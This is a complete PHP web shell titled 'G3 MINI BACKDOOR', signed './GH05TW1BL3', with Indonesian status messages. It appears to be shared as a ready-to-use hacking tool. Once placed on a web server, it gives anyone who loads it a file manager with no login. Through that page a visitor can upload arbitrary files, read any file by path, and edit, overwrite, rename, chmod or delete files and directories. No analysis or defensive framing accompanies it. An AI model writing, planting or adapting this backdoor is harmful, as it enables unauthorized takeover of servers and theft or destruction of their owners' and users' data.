Wible

1. <?php
2. /// G3 MINI BACKDOOR
3. //// ./GH05TW1BL3
4. set_time_limit(0);
5. error_reporting(0);
6.  
7. if(get_magic_quotes_gpc()){
8. foreach($_POST as $key=>$value){
9. $_POST[$key] = stripslashes($value);
10. }
11. }
12. echo '<!DOCTYPE HTML>
13. <HTML>
14. <HEAD>
15. <link href="" rel="stylesheet" type="text/css">
16. <title>./G3 M1N1 B3KD00R</title>
17. <style type="text/css">
18. html,body {
19. margin: 0;
20. padding: 0;
21. outline: 0;
22. }
23. a{
24. font-size: 13px;
25. color: white;
26. }
27. body {
28. direction: ltr;
29. background-color: black;
30. color: rgb(153, 153, 153);
31. text-align: center
32. font-family:Iceland;
33. color: white;
34. }
35. input,textarea,select{
36. font-weight: bold;
37. color: red;
38. }
39. input,textarea,select:hover{
40. box-shadow: 0px 0px 4px red;
41. }
42. #content tr:hover{
43. background-color: red;
44. text-shadow:0px 0px 10px #000000;
45. }
46. #content .first{
47. background-color: yellow;
48. text-shadow:0px 0px 1px red;
49. color: red;
50. }
51. #content .first:hover{
52. background-color: yellow;
53. text-shadow:0px 0px 1px red;
54. color: red;
55. }
56. table{
57. border: 4px yellow outset;
58. }
59. a{
60. color: white;
61. text-decoration: none;
62. }
63. a:hover{
64. color: white;
65. text-shadow:0px 0px 10px red;
66. }
67. input,select,textarea{
68. border: 0px #000000 solid;
69. -moz-border-radius: 5px;
70. -webkit-border-radius:5px;
71. border-radius:5px;
72. }
73. </style>
74. </HEAD>
75. <BODY>
76. <center><img src="https://i.ibb.co/nf1Nkg4/1553178697-picsay.png"/><br />
77. <font size="3" color="lime">'.php_uname().'</font></center>
78. <body class="pace-done" bgcolor="Black"><div class="pace pace-inactive">
79. <div class="pace-progress" data-progress-text="100%" data-progress="99" style="width: 100%;">
80. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
81. <tr><td>Current Path : ';
82. if(isset($_GET['path'])){
83. $path = $_GET['path'];
84. }else{
85. $path = getcwd();
86. }
87. $path = str_replace('\\','/',$path);
88. $paths = explode('/',$path);
89.  
90. foreach($paths as $id=>$pat){
91. if($pat == '' && $id == 0){
92. $a = true;
93. echo '<a href="?path=/">/</a>';
94. continue;
95. }
96. if($pat == '') continue;
97. echo '<a href="?path=';
98. for($i=0;$i<=$id;$i++){
99. echo "$paths[$i]";
100. if($i != $id) echo "/";
101. }
102. echo '">'.$pat.'</a>/';
103. }
104. echo '</td></tr><tr><td>';
105. if(isset($_FILES['file'])){
106. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
107. echo '<font color="lime">Upload File Berhasil :)</font><br />';
108. }else{
109. echo '<font color="red">Mampuss Gagalll</font><br />';
110. }
111. }
112. echo '<form enctype="multipart/form-data" method="POST">
113. Upload File : <input type="file" name="file" />
114. <input type="submit" value="Upload" />
115. </form>
116. <a href="?"><input type="submit" value="Home" />
117. </td></tr>';
118. if(isset($_GET['filesrc'])){
119. echo "<tr><td>Current File : ";
120. echo $_GET['filesrc'];
121. echo '</tr></td></table><br />';
122. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
123. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
124. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
125. if($_POST['opt'] == 'chmod'){
126. if(isset($_POST['perm'])){
127. if(chmod($_POST['path'],$_POST['perm'])){
128. echo '<font color="lime">Mengubah Permission Berhasil</font><br />';
129. }else{
130. echo '<font color="red">Mengubah Permission Gagal</font><br />';
131. }
132. }
133. echo '<form method="POST">
134. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
135. <input type="hidden" name="path" value="'.$_POST['path'].'">
136. <input type="hidden" name="opt" value="chmod">
137. <input type="submit" value="Go" />
138. </form>';
139. }elseif($_POST['opt'] == 'rename'){
140. if(isset($_POST['newname'])){
141. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
142. echo '<font color="lime">Ganti Nama Berhasil</font><br />';
143. }else{
144. echo '<font color="red">Ganti Nama Gagal</font><br />';
145. }
146. $_POST['name'] = $_POST['newname'];
147. }
148. echo '<form method="POST">
149. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
150. <input type="hidden" name="path" value="'.$_POST['path'].'">
151. <input type="hidden" name="opt" value="rename">
152. <input type="submit" value="Go" />
153. </form>';
154. }elseif($_POST['opt'] == 'edit'){
155. if(isset($_POST['src'])){
156. $fp = fopen($_POST['path'],'w');
157. if(fwrite($fp,$_POST['src'])){
158. echo '<font color="lime">Edit File Berhasil</font><br />';
159. }else{
160. echo '<font color="red">Edit File Gagal</font><br />';
161. }
162. fclose($fp);
163. }
164. echo '<form method="POST">
165. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
166. <input type="hidden" name="path" value="'.$_POST['path'].'">
167. <input type="hidden" name="opt" value="edit">
168. <input type="submit" value="Go" />
169. </form>';
170. }
171. echo '</center>';
172. }else{
173. echo '</table><br /><center>';
174. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
175. if($_POST['type'] == 'dir'){
176. if(rmdir($_POST['path'])){
177. echo '<font color="lime">Menghapus Directory Berhasil</font><br />';
178. }else{
179. echo '<font color="red">Menghapus Directory Gagal</font><br />';
180. }
181. }elseif($_POST['type'] == 'file'){
182. if(unlink($_POST['path'])){
183. echo '<font color="lime">Delete File Berhasil</font><br />';
184. }else{
185. echo '<font color="red">Delete File Error</font><br />';
186. }
187. }
188. }
189. echo '</center>';
190. $scandir = scandir($path);
191. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
192. <tr class="first">
193. <td><center>Name</center></td>
194. <td><center>Size</center></td>
195. <td><center>Permissions</center></td>
196. <td><center>Options</center></td>
197. </tr>';
198.  
199. foreach($scandir as $dir){
200. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
201. echo "<tr>
202. <td><a href=\"?path=$path/$dir\">$dir</a></td>
203. <td><center>--</center></td>
204. <td><center>";
205. if(is_writable("$path/$dir")) echo '<font color="lime">';
206. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
207. echo perms("$path/$dir");
208. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
209.  
210. echo "</center></td>
211. <td><center><form method=\"POST\" action=\"?option&path=$path\">
212. <select name=\"opt\">
213. <option value=\"\"></option>
214. <option value=\"delete\">Delete</option>
215. <option value=\"chmod\">Chmod</option>
216. <option value=\"rename\">Rename</option>
217. </select>
218. <input type=\"hidden\" name=\"type\" value=\"dir\">
219. <input type=\"hidden\" name=\"name\" value=\"$dir\">
220. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
221. <input type=\"submit\" value=\"Oke\" />
222. </form></center></td>
223. </tr>";
224. }
225. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
226. foreach($scandir as $file){
227. if(!is_file("$path/$file")) continue;
228. $size = filesize("$path/$file")/1024;
229. $size = round($size,3);
230. if($size >= 1024){
231. $size = round($size/1024,2).' MB';
232. }else{
233. $size = $size.' KB';
234. }
235.  
236. echo "<tr>
237. <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
238. <td><center>".$size."</center></td>
239. <td><center>";
240. if(is_writable("$path/$file")) echo '<font color="lime">';
241. elseif(!is_readable("$path/$file")) echo '<font color="red">';
242. echo perms("$path/$file");
243. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
244. echo "</center></td>
245. <td><center><form method=\"POST\" action=\"?option&path=$path\">
246. <select name=\"opt\">
247. <option value=\"\"></option>
248. <option value=\"delete\">Delete</option>
249. <option value=\"chmod\">Chmod</option>
250. <option value=\"rename\">Rename</option>
251. <option value=\"edit\">Edit</option>
252. </select>
253. <input type=\"hidden\" name=\"type\" value=\"file\">
254. <input type=\"hidden\" name=\"name\" value=\"$file\">
255. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
256. <input type=\"submit\" value=\"Oke\" />
257. </form></center></td>
258. </tr>";
259. }
260. echo '</table>
261. </div>';
262. }
263. echo '<center><br />./GH05TW1BL3 - Garuda Tersakti 72</font><center>
264. </BODY>
265. </HTML>';
266. function perms($file){
267. $perms = fileperms($file);
268.  
269. if (($perms & 0xC000) == 0xC000) {
270. // Socket
271. $info = 's';
272. } elseif (($perms & 0xA000) == 0xA000) {
273. // Symbolic Link
274. $info = 'l';
275. } elseif (($perms & 0x8000) == 0x8000) {
276. // Regular
277. $info = '-';
278. } elseif (($perms & 0x6000) == 0x6000) {
279. // Block special
280. $info = 'b';
281. } elseif (($perms & 0x4000) == 0x4000) {
282. // Directory
283. $info = 'd';
284. } elseif (($perms & 0x2000) == 0x2000) {
285. // Character special
286. $info = 'c';
287. } elseif (($perms & 0x1000) == 0x1000) {
288. // FIFO pipe
289. $info = 'p';
290. } else {
291. // Unknown
292. $info = 'u';
293. }
294.  
295. // Owner
296. $info .= (($perms & 0x0100) ? 'r' : '-');
297. $info .= (($perms & 0x0080) ? 'w' : '-');
298. $info .= (($perms & 0x0040) ?
299. (($perms & 0x0800) ? 's' : 'x' ) :
300. (($perms & 0x0800) ? 'S' : '-'));
301.  
302. // Group
303. $info .= (($perms & 0x0020) ? 'r' : '-');
304. $info .= (($perms & 0x0010) ? 'w' : '-');
305. $info .= (($perms & 0x0008) ?
306. (($perms & 0x0400) ? 's' : 'x' ) :
307. (($perms & 0x0400) ? 'S' : '-'));
308.  
309. // World
310. $info .= (($perms & 0x0004) ? 'r' : '-');
311. $info .= (($perms & 0x0002) ? 'w' : '-');
312. $info .= (($perms & 0x0001) ?
313. (($perms & 0x0200) ? 't' : 'x' ) :
314. (($perms & 0x0200) ? 'T' : '-'));
315.  
316. return $info;
317. }
318. ?>